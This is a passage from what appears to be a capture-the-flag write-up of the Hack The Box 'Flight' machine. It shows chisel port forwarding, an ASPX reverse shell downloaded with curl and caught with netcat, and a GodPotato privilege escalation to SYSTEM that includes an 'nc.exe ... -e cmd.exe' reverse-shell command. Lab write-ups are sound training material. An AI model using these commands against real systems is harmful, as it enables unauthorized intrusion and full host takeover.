2025/08/20 21:38:11 server: Listening on <http://0.0.0.0:8000>
2025/08/20 21:39:09 server: session#1: Client version (1.10.1) differs from server version (0.0.0-src)
2025/08/20 21:39:09 server: session#1: tun: proxy#R:8001=>8000: ListeningPS C:\\temp> .\\chisel.exe client 10.10.16.6:8000 R:8001:127.0.0.1:8000
.\\chisel.exe client 10.10.16.6:8000 R:8001:127.0.0.1:8000
2025/08/20 16:09:10 client: Connecting to ws://10.10.16.6:8000
2025/08/20 16:09:15 client: Connected (Latency 370.9469ms)Nice I can access port 8000 via localhost:8001
└─$ nmap -sC -sV -p 8001 127.0.0.1
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-20 21:40 IST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000085s latency).
PORT STATE SERVICE VERSION
8001/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Flight - Travel and Tour
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 27.41 secondsport 8000
website was not functioning
uploading Revshell (Auth as defaultapppool)
User C.Bum has Write access (not full control).
PS C:\\inetpub> icacls development
icacls development
development flight\\C.Bum:(OI)(CI)(W)
NT SERVICE\\TrustedInstaller:(I)(F)
NT SERVICE\\TrustedInstaller:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\\SYSTEM:(I)(F)
NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\\Administrators:(I)(F)
BUILTIN\\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\\Users:(I)(RX)
BUILTIN\\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
PS C:\\inetpub> Let’s try to upload a test PHP file
Looks like we need to upload the ASP.NET file
┌──(anurag㉿anurag)-[~/htb/Flight]
└─$ cat test.aspx
<% Response.Write("Hello World") %> 
Let’s upload a revshell
I will use this revshell
PS C:\\inetpub\\development> curl <http://10.10.16.6/revshell.aspx> -o revshell.aspx
curl <http://10.10.16.6/revshell.aspx> -o revshell.aspx
PS C:\\inetpub\\development> dir
dir
Directory: C:\\inetpub\\development
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 8/20/2025 4:42 PM css
d----- 8/20/2025 4:42 PM fonts
d----- 8/20/2025 4:42 PM img
d----- 8/20/2025 4:42 PM js
-a---- 4/16/2018 2:23 PM 9371 contact.html
-a---- 4/16/2018 2:23 PM 45949 index.html
-a---- 8/20/2025 4:42 PM 15546 revshell.aspx
PS C:\\inetpub\\development> and load http://127.0.0.1:8001/revshell.aspx
└─$ nc -nlvp 2222
listening on [any] 2222 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.11.187] 54149
Spawn Shell...
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\\windows\\system32\\inetsrv>whoami
whoami
iis apppool\\defaultapppool
c:\\windows\\system32\\inetsrv>SeImpersonatePrivilege
C:\\Users>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
========================== =============================================================
iis apppool\\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Mandatory Label\\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
C:\\Users>Since we have SeImpersonatePrivilege we can perform a Potato attack
I will use this
C:\\temp>.\\GodPotato-NET4.exe -cmd "cmd /c whoami"
.\\GodPotato-NET4.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140712155545600
[*] DispatchTable: 0x140712157851712
[*] UseProtseqFunction: 0x140712157228240
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\\\.\\pipe\\f383a545-0b6d-4574-948e-ba1c5e1c90e3\\pipe\\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00009402-05d0-ffff-fec1-967cb7707aef
[*] DCOM obj OXID: 0x219584eb64a20631
[*] DCOM obj OID: 0xa2681efa43cbb056
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 924 Token:0x816 User: NT AUTHORITY\\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\\SYSTEM
[*] process start with pid 1900
nt authority\\system
C:\\temp>we can get shell or simply view root.txt
C:\\temp>.\\GodPotato-NET4.exe -cmd "cmd /c nc.exe 10.10.16.6 2233 -e cmd.exe"
.\\GodPotato-NET4.exe -cmd "cmd /c nc.exe 10.10.16.6 2233 -e cmd.exe"
[*] CombaseModule: 0x140712155545600
[*] DispatchTable: 0x140712157851712
[*] UseProtseqFunction: 0x140712157228240
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\\\.\\pipe\\9098d5e6-1183-4515-8c9f-d4ef1ec78d0d\\pipe\\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00005c02-0d7c-ffff-8630-45d3e81365ea
[*] DCOM obj OXID: 0x1fe1e7b8e6cba310
[*] DCOM obj OID: 0x3f4265f8f9cd1ae9
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 924 Token:0x816 User: NT AUTHORITY\\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\\SYSTEM
[*] process start with pid 3236└─$ nc -nlvp 2233
listening on [any] 2233 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.11.187] 54207
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\temp>whoami
whoami
nt authority\\system
C:\\temp>dir C:\\Users\\Administrator\\Desktop
dir C:\\Users\\Administrator\\Desktop
Volume in drive C has no label.
Volume Serial Number is 1DF4-493D
Directory of C:\\Users\\Administrator\\Desktop
09/22/2022 01:48 PM <DIR> .
09/22/2022 01:48 PM <DIR> ..
08/19/2025 02:21 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 4,917,837,824 bytes free
C:\\temp>Last updated